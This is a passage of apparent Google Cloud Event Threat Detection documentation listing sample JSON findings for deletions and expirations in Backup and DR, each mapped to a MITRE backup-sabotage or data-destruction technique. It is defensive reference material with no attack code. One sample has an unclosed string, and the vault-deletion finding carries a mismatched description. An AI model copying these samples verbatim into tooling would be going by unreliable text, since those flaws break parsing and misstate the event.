Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A backup stored in a backup vault has been manually deleted. The backup was stored in REGION" } }
Impact: Deleted Google Cloud Backup and DR host
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "deleteHost", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "host": "HOST_NAME", "applications": [ "HOST_NAME" ], "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Deleted Google Cloud Backup and DR host", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A host was deleted from the Google Cloud Backup and DR Service. Applications that are associated with the deleted host might not be protected.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_hosts_delete_host" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A host was deleted from the Google Cloud Backup and DR Service. Applications that are associated with the deleted host might not be protected.", "backupDisasterRecovery": { "host": "HOST_NAME", "applications": [ "HOST_NAME" ] } } }
Impact: Deleted Google Cloud Backup and DR plan association
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "google.cloud.backupdr.v1.BackupDR.DeleteBackupPlanAssociation", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Deleted Google Cloud Backup and DR plan association", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A backup plan has been removed from a workload. Backups are no longer scheduled on the workload. The resource(s) affected are in REGION", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_delete_backup_plan_association }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER/backupPlanAssociations/BACKUP_PLAN_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A backup plan has been removed from a workload. Backups are no longer scheduled on the workload. The resource(s) affected are in REGION" } }
Impact: Deleted Google Cloud Backup and DR Vault
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "google.cloud.backupdr.v1.BackupDR.DeleteBackupVault", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Deleted Google Cloud Backup and DR Vault", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A Backup Vault has been deleted from the Google Cloud Backup and DR Service. The affected Backup Vault was hosted in VAULT_LOCATION", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_delete_vault" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER/locations/REGION/backupVaults/VAULT_NAME" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "The expiration date for a backup has been reduced. The affected Backup Vault was hosted in REGION" } }
Impact: Google Cloud Backup and DR delete policy
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "deletePolicy", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "policies": [ "DeleteMe" ], "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR delete policy", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A Google Cloud Backup and DR Service policy, which defines how a backup is taken and where it is stored, was deleted. Future backups that use the policy might fail.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_template_delete_policy" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A Google Cloud Backup and DR Service policy, which defines how a backup is taken and where it is stored, was deleted. Future backups that use the policy might fail.", "backupDisasterRecovery": { "policies": [ "POLICY_NAME" ] } } }
Impact: Google Cloud Backup and DR delete profile
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "deleteSlp", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "profile": "PROFILE_NAME", "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR delete profile", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A Google Cloud Backup and DR Service profile, which defines which storage pools should be used to store backups, was deleted. Future backups that use the profile might fail.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_template_delete_profile" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A Google Cloud Backup and DR Service profile, which defines which storage pools should be used to store backups, was deleted. Future backups that use the profile might fail.", "backupDisasterRecovery": { "profile": "PROFILE_NAME" } } }
Impact: Google Cloud Backup and DR delete storage pool
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "deleteDiskPool", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "storagePool": "STORAGE_POOL_NAME", "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR delete storage pool", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A storage pool, which associates a Cloud Storage bucket with Google Cloud Backup and DR, has been removed from Backup and DR. Future backups to this storage target will fail.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_storage_pools_delete" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A storage pool, which associates a Cloud Storage bucket with Google Cloud Backup and DR, has been removed from Backup and DR. Future backups to this storage target will fail.", "backupDisasterRecovery": { "storagePool": "STORAGE_POOL_NAME" } } }
Impact: Google Cloud Backup and DR delete template
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "deleteSlt", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "backupTemplate": "TEMPLATE_NAME", "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR delete template", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A predefined backup template, which is used to set up backups for multiple applications, was deleted. The ability to set up backups in the future might be impacted.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "LOW", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_template_delete_template" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A predefined backup template, which is used to set up backups for multiple applications, was deleted. The ability to set up backups in the future might be impacted.", "backupDisasterRecovery": { "backupTemplate": "TEMPLATE_NAME" } } }
Impact: Google Cloud Backup and DR expire all images
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": {}, "serviceName": "backupdr.googleapis.com", "methodName": "expireBackups", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR expire all images", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A user requested the deletion of all backup images for a protected application from the Google Cloud Backup and DR Service. The deletion of backup images does not prevent future backups.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "DATA_DESTRUCTION" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_expire_images_all" }, "detectionPriority": "HIGH", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1485/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A user requested the deletion of all backup images for a protected application from the Google Cloud Backup and DR Service. The deletion of backup images does not prevent future backups." } }
Impact: Google Cloud Backup and DR expire image
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "IP_ADDRESS", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "expireBackup", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "backupDisasterRecovery": { "backupTemplate": "TEMPLATE_NAME", "policies": [ "POLICY_NAME" ], "profile": "PROFILE_NAME", "backupCreateTime": "EVENT_TIMESTAMP" }, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR expire image", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "A user requested the deletion of a backup image from the Google Cloud Backup and DR Service. The deletion of a backup image does not prevent future backups.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "DATA_DESTRUCTION" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "HIGH", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_expire_image" }, "detectionPriority": "MEDIUM", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1485/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "A user requested the deletion of a backup image from the Google Cloud Backup and DR Service. The deletion of a backup image does not prevent future backups.", "backupDisasterRecovery": { "backupTemplate": "TEMPLATE_NAME", "policies": [ "POLICY_NAME" ], "profile": "PROFILE_NAME" } } }
Impact: Google Cloud Backup and DR reduced backup expiration
{ "finding": { "access": { "principalEmail": "USER_EMAIL", "callerIp": "CALLER_IP", "callerIpGeo": { "regionCode": "REGION_CODE" }, "serviceName": "backupdr.googleapis.com", "methodName": "updateBackup", "principalSubject": "user:USER_EMAIL" }, "attackExposure": {}, "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/locations/FINDING_LOCATION/findings/FINDING_ID", "category": "Impact: Google Cloud Backup and DR reduced backup expiration", "cloudDlpDataProfile": {}, "cloudDlpInspection": {}, "createTime": "EVENT_TIMESTAMP", "database": {}, "description": "The expiration date for a backup has been reduced.", "eventTime": "EVENT_TIMESTAMP", "exfiltration": {}, "findingClass": "THREAT", "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/etd", "indicator": {}, "kernelRootkit": {}, "kubernetes": {}, "mitreAttack": { "primaryTactic": "IMPACT", "primaryTechniques": [ "INHIBIT_SYSTEM_RECOVERY" ] }, "mute": "UNDEFINED", "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID", "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID", "parentDisplayName": "Event Threat Detection", "resourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "severity": "MEDIUM", "state": "ACTIVE", "vulnerability": {}, "externalSystems": {} }, "resource": { "name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "display_name": "PROJECT_ID", "type": "google.cloud.resourcemanager.Project", "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER", "project_display_name": "PROJECT_ID", "parent_name": "//cloudresourcemanager.googleapis.com/organizations/ORGANIZATION_ID", "parent_display_name": "FOLDER_NAME", "folders": [] }, "sourceProperties": { "sourceId": { "projectNumber": "PROJECT_NUMBER", "customerOrganizationNumber": "ORGANIZATION_ID" }, "detectionCategory": { "ruleName": "backup_reduce_backup_expiration" }, "detectionPriority": "LOW", "affectedResources": [ { "gcpResourceName": "//backupdr.googleapis.com/projects/PROJECT_NUMBER" }, { "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER" } ], "evidence": [ { "sourceLogId": { "projectId": "PROJECT_ID", "resourceContainer": "projects/PROJECT_ID", "timestamp": { "seconds": "0", "nanos": 0.0 }, "insertId": "INSERT_ID" } } ], "properties": {}, "findingId": "FINDING_ID", "contextUris": { "mitreUri": { "displayName": "MITRE Link", "url": "https://attack.mitre.org/techniques/T1490/" }, "cloudLoggingQueryUri": [ { "displayName": "Cloud Logging Query Link", "url": "LINK_TO_LOG_QUERY" } ], "relatedFindingUri": {} }, "description": "The expiration date for a backup has been reduced." } }
Impact: Google Cloud Backup and DR reduced backup frequency
